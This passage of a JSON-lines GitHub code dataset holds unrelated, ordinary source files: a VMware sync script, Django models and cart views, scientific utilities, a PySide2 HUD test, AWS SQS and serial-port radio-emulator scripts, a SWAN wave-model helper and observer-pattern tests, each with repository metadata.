cursor.execute(\"UPDATE SET SyncDate = ?
WHERE SubscribedLibraryID = ?\", date2, synclibraryid)\n cursor.commit()\n print(\"db update done in except\")\n else:\n print(\"sync triggered for all\")\n\n\n# Main function call the AUTH API of Vcenter and pass the session id for sync to sync_subscribed_library()\n\ndef main():\n \n url = \"https:///rest/com/vmware/cis/session\"\n\n payload = {}\n headers = {\n 'Authorization': 'Basic =',\n 'Cookie': 'vmware-api-session-id=f'\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload, verify=False)\n\n response_body = response.json()\n sessionid = response_body['value']\n if (response.status_code == 200):\n sync_subscribed_library(sessionid, payload)\n else:\n print(response.status_code)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"prianca99/Vmware-Content-Libray-Sync---Rest-API","sub_path":"LibrarySync.py","file_name":"LibrarySync.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2515567401","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom django.utils import timezone\nfrom .managers import CustomUserManager\n# Create your models here.\n\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \n email = models.EmailField(('email address'), unique=True)\n username = models.CharField(max_length=255)\n first_name = models.CharField(max_length=255)\n middle_name = models.CharField(max_length=255)\n is_staff = models.BooleanField(default=False)\n is_active = models.BooleanField(default=True)\n is_admin = models.BooleanField(default=False)\n date_joined = models.DateTimeField(default=timezone.now)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n \n objects = CustomUserManager()\n\n def __str__(self):\n return self.emailclear\n \n \n\n ","repo_name":"spectra-py/collections_api","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15741694837","text":"#!/usr/bin/python\n\nimport numpy as np\nfrom astropy.io import fits as pyfits\nimport glob\n\nsigma = np.loadtxt('./sigma_mu.txt')\ne_pecvel = (5*150/cst.c.to('km/s').value)/(np.log(10)*z)\ne_lens = 0.055*z\ne_coh = sigma[:,0]\n\ndef mu_cov(alpha, beta, z, e_coh, e_pecvel, e_lens):\n \"\"\" Assemble the full covariance matrix of distance modulus\n\n See Betoule et al. (2014), Eq. 11-13 for reference\n \"\"\"\n Ceta = sum([pyfits.getdata(mat) for mat in glob.glob('C*.fits')])\n\n Cmu = np.zeros_like(Ceta[::3,::3])\n for i, coef1 in enumerate([1., alpha, -beta]):\n for j, coef2 in enumerate([1., alpha, -beta]):\n Cmu += (coef1 * coef2) * Ceta[i::3,j::3]\n\n # Add diagonal term from Eq. 
13\n Cmu[np.diag_indices_from(Cmu)] += e_lens**2 + e_coh**2 + e_pecvel**2 \n return Cmu\n\nif __name__ == \"__main__\":\n Cmu = mu_cov(0.13, 3.1, z, e_coh, e_pecvel, e_lens)\n","repo_name":"vicbonj/SN","sub_path":"data/covmat/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"8026314686","text":"import numpy\nimport pandas\nfrom scipy.signal import savgol_filter\n\n\ndef points_per_hour(series):\n if len(series) < 2:\n return len(series)\n\n return 1 / numpy.median(series.index[1:] - series.index[:-1])\n\n\ndef savitzky_golay(series, *args, **kwargs):\n return pandas.Series(\n index=series.index, data=savgol_filter(series.values, *args, **kwargs)\n )\n\n\ndef with_overhangs(values, overhang_size):\n start_overhang = numpy.repeat(\n [numpy.median(values[0 : overhang_size // 2 + 1])], overhang_size\n )\n end_overhang = numpy.repeat(\n [numpy.max(values[-1 - overhang_size // 2 : -1])], overhang_size\n )\n return pandas.Series(numpy.concatenate([start_overhang, values, end_overhang]))\n\n\ndef normalize_time_unit(curve: pandas.Series, unit: str = \"hours\"):\n if unit == \"hours\":\n return curve\n elif unit == \"minutes\":\n return pandas.Series(index=curve.index / 60.0, data=curve.values)\n else:\n raise NotImplementedError(\"Unsupported time unit: '{}'\".format(unit))\n","repo_name":"biosustain/croissance","sub_path":"croissance/estimation/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"19"}
{"seq_id":"72864529642","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('backend', '0020_pulldevice_delimiter'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='device',\n name='datetime_title',\n field=models.CharField(max_length=30, null=True),\n ),\n ]","repo_name":"cratas/home-automation-rpi","sub_path":"home_automation/backend/migrations/0021_device_datetime_title.py","file_name":"0021_device_datetime_title.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"29620219906","text":"import sys\r\nfrom PySide2.QtCore import Qt, QSize\r\nfrom PySide2.QtWidgets import QApplication, QStyle\r\nfrom PySide2.QtGui import QColor, QPalette\r\n\r\nfrom unittest.mock import Mock, patch\r\n \r\ndef hud_test():\r\n attrs = {'settings.HUD_TITLE': \"HUD\"}\r\n mock = Mock(**attrs)\r\n with patch.dict('sys.modules', {\r\n 'castervoice' : mock,\r\n 'castervoice.lib' : mock,\r\n 'castervoice.lib.merge' : mock,\r\n 'castervoice.lib.merge.communication' : mock,\r\n 'castervoice.lib.merge.communication.Communicator' : mock,\r\n 'dragonfly' : mock,\r\n }):\r\n from hud import HUDWindow\r\n huds_launch(HUDWindow) \r\n \r\ndef huds_launch(HUDWindow):\r\n app = QApplication(sys.argv)\r\n windows = [\r\n HUDWindow(Mock()),\r\n HUDWindow(Mock()),\r\n HUDWindow(Mock()),\r\n HUDWindow(Mock()),\r\n ]\r\n \r\n setup_themes(windows)\r\n \r\n for window in windows:\r\n window.show()\r\n \r\n messages = [\r\n '< numb one',\r\n '> Numbers: [] numb , , 1',\r\n '< numb two',\r\n '> Numbers: [] numb , , 2',\r\n '< numb three',\r\n '> Numbers: [] numb , , 3',\r\n '< numb four',\r\n '> Numbers: [] numb , , 4',\r\n '< numb five',\r\n '> Numbers: [] numb , , 5',\r\n '< numb six',\r\n '> Numbers: [] numb , , 6',\r\n ]\r\n \r\n for i, 
message in enumerate(messages):\r\n for window in windows:\r\n window.output.append(message)\r\n\r\n app.exec_()\r\n\r\ndef setup_themes(windows):\r\n theme_window(\r\n window = windows[0], \r\n window_height = 200,\r\n alignment = Qt.AlignHCenter | Qt.AlignVCenter, \r\n background_color = QColor(245, 245, 245, 255), \r\n font_size = 8, \r\n margins = 4, \r\n scrollbar = True,\r\n frameless = False,\r\n )\r\n windows[0].output.setAlignment(Qt.AlignLeft | Qt.AlignBottom)\r\n\r\n theme_window(\r\n window = windows[1], \r\n window_height = 200,\r\n alignment = Qt.AlignRight | Qt.AlignVCenter, \r\n rect_color = QColor(255, 255, 255, 150), \r\n border_radius = 14, \r\n outline_color = QColor(0, 0, 0, 255), \r\n outline_width = 2, \r\n force_disable_background = True,\r\n spacing = 3,\r\n #frameless = False,\r\n )\r\n \r\n theme_window(\r\n window = windows[2], \r\n alignment = Qt.AlignHCenter | Qt.AlignBottom, \r\n rect_color = QColor(240, 240, 240), \r\n font_size = 18, \r\n margins = 2, \r\n force_disable_background = True, \r\n scrollbar = True, \r\n font_family = \"Courier\"\r\n )\r\n \r\n theme_window(\r\n window = windows[3],\r\n window_width = 550,\r\n alignment = Qt.AlignRight | Qt.AlignBottom, \r\n rect_color = QColor(50, 40, 48), \r\n background_color = QColor(21, 8, 0, 100), \r\n text_color = QColor(210, 84, 0), \r\n border_radius = 10, \r\n spacing = 10,\r\n #frameless = False,\r\n )\r\n \r\ndef theme_window(\r\n window, \r\n alignment,\r\n window_width = 300,\r\n window_height = 300,\r\n rect_color = QColor(255, 255, 255, 0),\r\n background_color = QColor(255, 255, 255, 0),\r\n text_color = QColor(0, 0, 0),\r\n font_size = 14,\r\n border_radius = 5,\r\n margins = 10,\r\n spacing = 5,\r\n outline_color = QColor(0, 0, 0, 0),\r\n outline_width = 0,\r\n scrollbar = False,\r\n force_disable_background = False,\r\n font_family = \"\",\r\n frameless = True,\r\n ):\r\n \r\n size = QSize(window_width, window_height)\r\n screen_geometry = qApp.primaryScreen().geometry()\r\n if frameless:\r\n screen_geometry.adjust(400, 160, -30, -30)\r\n else:\r\n screen_geometry.adjust(400, 130, -30, -60)\r\n \r\n window.setGeometry(\r\n QStyle.alignedRect(\r\n Qt.LeftToRight,\r\n alignment,\r\n size,\r\n screen_geometry\r\n )\r\n )\r\n \r\n palette = window.palette()\r\n palette.setColor(QPalette.Base, rect_color)\r\n palette.setColor(QPalette.Window, background_color)\r\n palette.setColor(QPalette.Text, text_color)\r\n window.setPalette(palette)\r\n \r\n window.output.setTextEditBorderRadius(border_radius)\r\n window.output.setTextEditMargins(margins)\r\n window.output.setSpacing(spacing)\r\n \r\n window.output.setRectOutlineColor(outline_color)\r\n window.output.setRectOutlineWidth(outline_width)\r\n \r\n if scrollbar:\r\n window.output.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n else:\r\n window.output.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n window.output.setForceDisableBackground(force_disable_background)\r\n \r\n font = window.font()\r\n font.setPointSize(font_size)\r\n font.setFamily(font_family)\r\n window.setFont(font)\r\n window.repaint()\r\n window.output.updateTextEdits()\r\n window.setWindowFlag(Qt.FramelessWindowHint, frameless)\r\n \r\nif __name__ == '__main__':\r\n hud_test()\r\n","repo_name":"termx88/Caster_command_hud","sub_path":"test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14118438551","text":"from flask import 
Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom .views import account\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('settings.DevelopmentConfig')\n\n # register db on the app\n db.init_app(app)\n\n # register blueprints\n app.register_blueprint(account.account)\n\n return app\n","repo_name":"HkwJsxl/PythonFullStackFlask","sub_path":"oldboy/Flask-SQLAlchemy_/start/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"41370349636","text":"import boto3\r\n\r\n# Create an SQS client\r\nboto3.setup_default_session(profile_name='sbadmin')\r\nsqs = boto3.client('sqs')\r\n\r\nqueue_url = 'https://sqs.us-east-2.amazonaws.com/218058812834/sb-events-sqs-lambda-message-queue'\r\n\r\n# Receive messages from the queue\r\nresponse = sqs.receive_message(\r\n    QueueUrl=queue_url,\r\n    MaxNumberOfMessages=10,\r\n    WaitTimeSeconds=20\r\n)\r\nprint(response)\r\n# Get the list of messages\r\nmessages = response.get('Messages', [])\r\nprint(messages)\r\n\r\n# Iterate through the messages and delete them\r\nfor message in messages:\r\n    receipt_handle = message['ReceiptHandle']\r\n    sqs.delete_message(\r\n        QueueUrl=queue_url,\r\n        ReceiptHandle=receipt_handle\r\n    )\r\n","repo_name":"tinitiate/aws-lambda-python","sub_path":"delete_sqs_queue.py","file_name":"delete_sqs_queue.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"37116676767","text":"import pandas as pd\r\nimport ast\r\n\r\nfrom sklearn.model_selection import train_test_split, ShuffleSplit\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nfrom data import load_json\r\n\r\n\r\ndef split(df: pd.DataFrame, seed: int=1156, test_size: float=0.1, split: bool=True):\r\n settings = load_json()\r\n column = settings[\"column\"][0]\r\n \r\n data = df[[column[\"target\"]] + column[\"text\"] + column[\"numerical\"]]\r\n \r\n return train_test_split(data, test_size=test_size, random_state=seed)\r\n \r\n \r\ndef preprocess(train: pd.DataFrame, test: pd.DataFrame, verbose: bool = True) -> pd.DataFrame:\r\n settings = load_json()\r\n\r\n train = _quantile(train, settings)\r\n train, test = _minmax(train, test, settings)\r\n train, test = _process_tokens(train, test, settings)\r\n \r\n return train, test\r\n\r\n\r\ndef _quantile(df: pd.DataFrame, settings, verbose: bool = True) -> pd.DataFrame:\r\n quantile = settings[\"preprocess\"][0][\"quantile\"][0][\"quantile\"]\r\n columns = settings[\"preprocess\"][0][\"quantile\"][0][\"columns\"]\r\n original_shape = df.shape[0]\r\n\r\n for column in columns:\r\n pre_rows = df.shape[0]\r\n df = df[df[column] < df[column].quantile(quantile)]\r\n\r\n if verbose:\r\n print(\"Removed\", pre_rows - df.shape[0], \"rows while filtering\", quantile, \"quantile of\", column)\r\n\r\n if verbose:\r\n print(\"Original rows: {}, rows after preprocessing: {}\".format(original_shape, df.shape[0]))\r\n print(\"Dataframe reduced by: {:2.2%}\".format(1. 
- (df.shape[0]/original_shape)))\r\n\r\n return df\r\n \r\n \r\ndef _minmax(train, test, settings):\r\n scaler = MinMaxScaler()\r\n columns = settings[\"preprocess\"][0][\"minmax\"]\r\n \r\n train[columns] = scaler.fit_transform(train[columns])\r\n test[columns] = scaler.transform(test[columns])\r\n \r\n return train, test\r\n \r\n \r\ndef _process_tokens(train, test, settings):\r\n train = _clear_tokens(train, settings)\r\n test = _clear_tokens(test, settings)\r\n \r\n return train, test\r\n \r\n \r\ndef _clear_tokens(df, settings):\r\n columns = settings[\"preprocess\"][0][\"token\"]\r\n \r\n for column in columns:\r\n values = [ast.literal_eval(row) for row in df[column]]\r\n values = _remove_empty(values)\r\n values = _remove_nan(values)\r\n # values = _remove_single_character(values)\r\n values = _to_string(values)\r\n \r\n df[column] = values\r\n \r\n return df\r\n \r\n \r\ndef _remove_empty(data):\r\n return [row if len(row) > 0 else [''] for row in data]\r\n \r\n \r\ndef _remove_nan(data):\r\n return [row if row[0] != 'nan' else [''] for row in data]\r\n \r\n\r\ndef _remove_single_character(data):\r\n return [[word for word in row if len(word) > 1 ] for row in data]\r\n \r\n \r\ndef _to_string(data):\r\n return [' '.join(row) for row in data]\r\n","repo_name":"Warwick1156/PED-WSB","sub_path":"bin/src/dataprep.py","file_name":"dataprep.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"31190536911","text":"num1 = input()\r\nnum2 = input()\r\nout1 = ''\r\nout2 = ''\r\nwhile len(num1)<len(num2):\r\n num1 = '0'+num1\r\nwhile len(num2)<len(num1):\r\n num2 = '0'+num2\r\nfor i1,i2 in zip(num1,num2):\r\n if i1>i2:\r\n out1 += i1\r\n elif i2>i1:\r\n out2 += i2\r\n else:\r\n out1 += i1\r\n out2 += i2\r\nif len(out1) == 0:\r\n print('YODA')\r\nelse:\r\n print(int(out1))\r\nif len(out2) == 0:\r\n print('YODA')\r\nelse:\r\n print(int(out2))","repo_name":"Nick-AI/ProgrammingPractice","sub_path":"Kattis/yoda.py","file_name":"yoda.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"73090261802","text":"import serial\n\nSERIAL_PORT = \"COM1\"\n\n### DATA SENT BY COMPUTER ###\n\n# initial request sent by computer\nC_READ_INIT = bytes.fromhex(\"FE 03 30 08\")\n# download request?\nC_DL_REQ = bytes.fromhex(\"45 02 50 52 4F 47 52 41 4C\")\nACK = bytes.fromhex(\"02\")\n\n### DATA SENT BY RADIO ###\n# expected response to initial program request\nR_INIT_RESP = bytes.fromhex(\"57 03 30 08 1F 03 FF FF FF FF FF FF\")\nR_READ_RESP = bytes.fromhex(\n    \"574502501f03ffffffffffffff00010100850100496201007c0100804562500100800008010ec7d2001a28080e002c002cff01ffff403e353254523e3c272653510d0f0b0eff19dd0b23ff87e527182338230003\"\n)  # a blank default config\nR_READ_RESP_WBEEP = bytes.fromhex(\n    \"574502501f03ffffffffffffff80010100850100496201007c0100804562500100800008750ec7d2021a28080e002c002cff01ffff403e353254523e3c272653510d0f0b0eff19dd0b23ff87e527182338230003\"\n)\n\n\ndef send_init_resp():\n    \"\"\"Send the response to the initial program request to the computer\"\"\"\n    ser.write(R_INIT_RESP)\n    print(\"Sent R_INIT_RESP data (radio to computer):\", R_INIT_RESP.hex())\n\n\ndef send_read_resp(read_resp):\n    \"\"\"Send the response to the read request to the computer\"\"\"\n    ser.write(read_resp)\n    print(\"Sent R_READ_RESP data (radio to computer):\", read_resp.hex())\n\n\nif __name__ == \"__main__\":\n    # Setup serial port\n    ser = serial.Serial(SERIAL_PORT, baudrate=9600)\n\n    try:\n        received_data = b\"\"  # Initialize an empty byte string 
for concatenation\n while True:\n # Read data from the serial port one byte at a time\n chunk = ser.read(1)\n received_data += chunk\n\n if received_data == C_READ_INIT:\n print(\"Received C_READ_INIT data (computer to radio):\", received_data.hex())\n # clear the buffer\n received_data = b\"\"\n # Send the response to the initial program request\n send_init_resp()\n\n if received_data == C_DL_REQ:\n print(\"Received C_DL_REQ data (computer to radio):\", received_data.hex())\n # clear the buffer\n received_data = b\"\"\n send_read_resp(R_READ_RESP)\n \n if received_data == bytes.fromhex(\"45\"):\n print(\"Received 45\")\n ser.write(bytes.fromhex(\"46\"))\n \n else:\n print(\"Received unexpected data (computer to radio):\", received_data)\n\n except KeyboardInterrupt:\n print(\"Exiting fakeradio program.\")\n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n finally:\n ser.close()\n","repo_name":"emuehlstein/baofeng_bfc50","sub_path":"archive/fakeradio.py","file_name":"fakeradio.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"74613540843","text":"def swanvectorvarspconst(Vx, Vy, savedata='no', outfilename='swanwind.wnd', outfilelocation=None):\r\n \"\"\"\r\n .. ++++++++++++++++++++++++++++++++YA LATIF++++++++++++++++++++++++++++++++++\r\n .. + +\r\n .. + ScientiMate +\r\n .. + Earth-Science Data Analysis Library +\r\n .. + +\r\n .. + Developed by: Arash Karimpour +\r\n .. + Contact : www.arashkarimpour.com +\r\n .. + Developed/Updated (yyyy-mm-dd): 2017-12-01 +\r\n .. + +\r\n .. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n scientimate.swanvectorvarspconst\r\n ================================\r\n\r\n .. code:: python\r\n\r\n swanvectorvariable = scientimate.swanvectorvarspconst(Vx, Vy, savedata='no', outfilename='swanwind.wnd', outfilelocation=None)\r\n\r\n Description\r\n -----------\r\n\r\n Generate SWAN file for spatially constant vector variable\r\n\r\n Inputs\r\n ------\r\n\r\n Vx\r\n | Variable in x direction (x component of input variable)\r\n | If size of Vx>1, then it is considered as a time series\r\n | 1st element is 1st time step, 2nd element is 2nd time step, ...\r\n Vy\r\n | Variable in y direction (y component of input variable)\r\n | Should have a same size as Vx\r\n savedata='no'\r\n | Define if save data in a file or not\r\n | 'no': does not save \r\n | 'yes': save data as ascii file\r\n outfilename='swanwind.wnd'\r\n | Name of output file between ' ' mark, example: 'swanwind.wnd'\r\n | outfilename should have proper name and extension\r\n outfilelocation=pwd\r\n Location of output file between ' ' mark, example: 'C:\\' in MATLAB, or 'C:/' in Python\r\n\r\n Outputs\r\n -------\r\n\r\n swanvectorvariable\r\n | Spatially constant vector variable formated for SWAN\r\n | Note: Vector variable at each time step is assigned into 4 points,\r\n | assuming the vector variable domain is defined by 4 points, one at each corner\r\n\r\n Examples\r\n --------\r\n\r\n .. code:: python\r\n\r\n import scientimate as sm\r\n\r\n windvelx=[10.5,10.6,10.55] #Data for 3 time steps\r\n windvely=[2.5,2.6,2.55] #Data for 3 time steps\r\n savedata='no'\r\n outfilename='swanwind.wnd'\r\n outfilelocation=None\r\n swanvectorvariable=sm.swanvectorvarspconst(windvelx,windvely,savedata,outfilename,outfilelocation)\r\n\r\n References\r\n ----------\r\n\r\n Booij, N. R. R. C., Ris, R. C., & Holthuijsen, L. H. (1999). 
\r\n A third‐generation wave model for coastal regions: 1. Model description and validation. \r\n Journal of geophysical research: Oceans, 104(C4), 7649-7666.\r\n\r\n SWAN Team. (2007). \r\n SWAN user manual. \r\n Delft University of Technology. The Netherlands.\r\n\r\n .. License & Disclaimer\r\n .. --------------------\r\n ..\r\n .. Copyright (c) 2020 Arash Karimpour\r\n ..\r\n .. http://www.arashkarimpour.com\r\n ..\r\n .. THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n .. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n .. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n .. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n .. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n .. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n .. SOFTWARE.\r\n \"\"\"\r\n\r\n #--------------------------------------------------------------------------\r\n #CODE\r\n #--------------------------------------------------------------------------\r\n #Import required packages\r\n\r\n import numpy as np\r\n import scipy as sp\r\n import os\r\n\r\n #--------------------------------------------------------------------------\r\n #Convert inputs to numpy array\r\n\r\n #Changing type to numpy array\r\n def type2numpy(variable):\r\n if type(variable) is not str:\r\n if np.size(variable)==1:\r\n if ((type(variable) is list) or (type(variable) is np.ndarray)):\r\n variable=np.array(variable)\r\n else:\r\n variable=np.array([variable])\r\n elif np.size(variable)>1:\r\n if (type(variable).__module__)!='numpy':\r\n variable=np.array(variable) \r\n return variable\r\n \r\n Vx=type2numpy(Vx)\r\n Vy=type2numpy(Vy)\r\n\r\n #--------------------------------------------------------------------------\r\n #Assign default values\r\n\r\n if outfilelocation is None: outfilelocation=os.getcwd()\r\n\r\n #--------------------------------------------------------------------------\r\n #Defining required functions\r\n\r\n def cart2pol(x,y):\r\n rho=np.sqrt(x**2+y**2)\r\n theta=np.arctan2(y,x)\r\n return theta,rho\r\n \r\n def pol2cart(theta,rho):\r\n x=rho*np.cos(theta)\r\n y=rho*np.sin(theta)\r\n return x,y\r\n\r\n #--------------------------------------------------------------------------\r\n #Generating SWAN file\r\n\r\n #If Vx=[U1;U2;U3]; and Vy=[V1;V2;V3];\r\n #Then SWAN wind file (.wnd) for this windvel with three time steps has a format of:\r\n # U1 U1\r\n # U1 U1\r\n # V1 V1\r\n # V1 V1\r\n # U2 U2\r\n # U2 U2\r\n # V2 V2\r\n # V2 V2\r\n # U3 U3\r\n # U3 U3\r\n # V3 V3\r\n # V3 V3\r\n \r\n #Creating the wind\r\n M=len(Vx)\r\n swanvectorvariable=np.zeros((4*M,2))\r\n for i in range(0,len(Vx),1):\r\n \r\n #Wind velocity at time step i, first method\r\n swanvectorvariable[4*i:4*i+2,0:2]=Vx[i] #x wind velocity at time step i\r\n swanvectorvariable[4*i+2:4*i+4,0:2]=Vy[i] #y wind velocity at time step i\r\n \r\n #Wind velocity at time step i, second method\r\n #x wind velocity at time step i\r\n #swanvectorvariable[4*i,0]=Vx[i];\r\n #swanvectorvariable[4*i,1]=Vx[i];\r\n #swanvectorvariable[4*i+1,0]=Vx[i];\r\n #swanvectorvariable[4*i+1,1]=Vx[i];\r\n \r\n #y wind velocity at time step i\r\n #swanvectorvariable[4*i+2,0]=Vy[i];\r\n #swanvectorvariable[4*i+2,1]=Vy[i];\r\n #swanvectorvariable[4*i+3,0]=Vy[i];\r\n #swanvectorvariable[4*i+3,1]=Vy[i];\r\n \r\n #--------------------------------------------------------------------------\r\n #Saving data\r\n\r\n if 
savedata=='yes':\r\n \r\n #Changing directory to saving directory\r\n currentFolder=os.getcwd()\r\n os.chdir(outfilelocation)\r\n \r\n #Saving data\r\n np.savetxt(outfilename,swanvectorvariable,delimiter=' ')\r\n \r\n #Changing directory to working directory\r\n os.chdir(currentFolder)\r\n\r\n #--------------------------------------------------------------------------\r\n #Outputs\r\n return swanvectorvariable\r\n\r\n #--------------------------------------------------------------------------\r\n","repo_name":"akarimp/ScientiMate","sub_path":"Python Functions/swan_wave_model/swanvectorvarspconst.py","file_name":"swanvectorvarspconst.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"19"} +{"seq_id":"5118018570","text":"# Subject from the GoF Observer pattern.\n\n__ver__=\"$Id$\"\n\nimport unittest\nimport types\nfrom strongbox import WhiteBox, attr\n\nclass WhiteBoxTest(unittest.TestCase):\n\n # we implement the famous Gang of Four Observer pattern:\n \n def check_Observable(self):\n subject = WhiteBox()\n observer = object()\n subject.addObserver(observer)\n assert observer in subject.private.observers\n subject.removeObserver(observer)\n assert observer not in subject.private.observers\n\n # Injectable is like Observable, but instead of notifying\n # on set, we notify on get. That's so we can lazy load objects:\n\n def check_Injectable(self):\n subject = WhiteBox()\n injector = object()\n subject.addInjector(injector)\n assert injector in subject.private.injectors\n subject.removeInjector(injector)\n assert injector not in subject.private.injectors\n \n\n # First the setter. Setters are easy. This is very useful for\n # transparent persistence (a la ZODB) and also for general\n # Model/View/Controller and Observer pattern stuff.\n # \n # As such, the events are fired AFTER the value is set\n # in the object. 
(Contrast to getter events, below...)\n\n def check_set_event(self):\n class Observer:\n def __init__(self):\n self.updated = False\n def update(self, subject, name, value):\n self.updated = True\n self.name = name\n self.value = value\n class Subject(WhiteBox):\n name = attr(str)\n\n # first, try with no observers:\n sub = Subject()\n sub.name='wilbur'\n assert sub.name=='wilbur', sub.name\n\n # now add an observer:\n obs = Observer()\n assert not obs.updated\n sub.addObserver(obs.update)\n sub.name = \"fred\"\n assert obs.updated, \"observer should have been updated on setattr\"\n assert obs.name == \"name\"\n assert obs.value == \"fred\"\n \n\n # Getters, on the other hand are useful for lazy loading.\n # As such, the events get fired BEFORE the value is returned.\n # \n # Of course, you couldn't call anything after you returned\n # a value anyway :)\n\n def check_get_event(self):\n class Injector:\n def __init__(self):\n self.called = 0\n def getter_called(self, subject, name):\n self.called += 1\n self.name = name\n subject.name = \"wilma\"\n class Subject(WhiteBox):\n name = attr(str)\n inj = Injector()\n sub = Subject(name=\"wanda\")\n sub.addInjector(inj.getter_called)\n value = sub.name\n assert inj.called==1, \\\n \"should have been called 1 time (vs %i)\" % inj.called\n assert inj.name == \"name\"\n assert value == \"wilma\", value\n\n def test_isDirty(self):\n \"\"\"\n this is for arlo...\n \"\"\"\n class Dirt(WhiteBox):\n x = attr(str)\n d = Dirt()\n # we start out dirty so that we get saved\n # (even if we're blank!)\n assert d.private.isDirty\n d = Dirt(x=\"dog\")\n assert d.private.isDirty\n\n # but if something marks us clean, and then\n # we change, we should be dirty again!\n d.private.isDirty = 0\n d.x = \"cat\"\n assert d.private.isDirty\n","repo_name":"sabren/sixthdev","sub_path":"@gone/strongbox/spec/WhiteBoxTest.py","file_name":"WhiteBoxTest.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"22731011549","text":"import json\n\nfrom django.contrib.sites.models import Site\nfrom django.http import HttpResponseBadRequest, HttpResponse\nfrom django.shortcuts import redirect, get_object_or_404, render\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import TemplateView\nfrom django.views.generic.edit import BaseFormView\nfrom django_jinja.views.generic import CreateView\n\nfrom apps.orders.cart import Cart\nfrom apps.orders.constants import OrderStatus\nfrom apps.orders.forms import CartOperationForm, ConfirmModelForm\nfrom apps.orders.models import Order, OrderItem, OrderSettings\nfrom apps.orders.services.delivery.constants import DeliveryMethod\nfrom apps.orders.services.payment.constants import PaymentMethod\nfrom apps.orders.services.payment.model import IPaymentType\nfrom apps.products.models import Product\nfrom shared.services.email import send_email\n\n\nclass CartTemplateView(TemplateView):\n template_name = \"orders/cart.jinja\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n cart: Cart = Cart(self.request)\n cart.updateQuantity()\n products = Product.objects.filter(pk__in=cart.cart_items.keys())\n data['cart'] = {product: cart.cart_items[str(product.pk)] for product in products}\n data['totalPrice'] = sum([product.price * cart.cart_items[str(product.pk)] for product in products])\n return 
data\n\n\nclass CartOperationView(BaseFormView):\n form_class = CartOperationForm\n\n def get(self, *args, **kwargs):\n return redirect(\"orders:cart\")\n\n def form_invalid(self, form):\n return HttpResponseBadRequest()\n\n def form_valid(self, form):\n product: Product = get_object_or_404(Product, slug=self.request.POST['slug'])\n cart: Cart = Cart(self.request)\n function = getattr(cart, self.request.POST['operation'], None)\n if function:\n # Check if its function and has @cart_option decorator\n if callable(function) and function.__dict__.get('cart', False):\n function(product, int(self.request.POST['value']))\n count = cart.cart_items.get(str(product.pk), 0)\n return HttpResponse(json.dumps({'count': count, 'price': count * product.price}, default=str))\n\n\nclass OrderCreateView(CreateView):\n template_name = \"orders/confirm.jinja\"\n model = Order\n form_class = ConfirmModelForm\n\n def dispatch(self, request, *args, **kwargs):\n self.cart = Cart(request)\n # If cart empty or cart items unavailable do redirect\n if len(self.cart.cart_items) == 0 or not self.cart.check_available():\n return redirect(\"orders:cart\")\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n\n products = 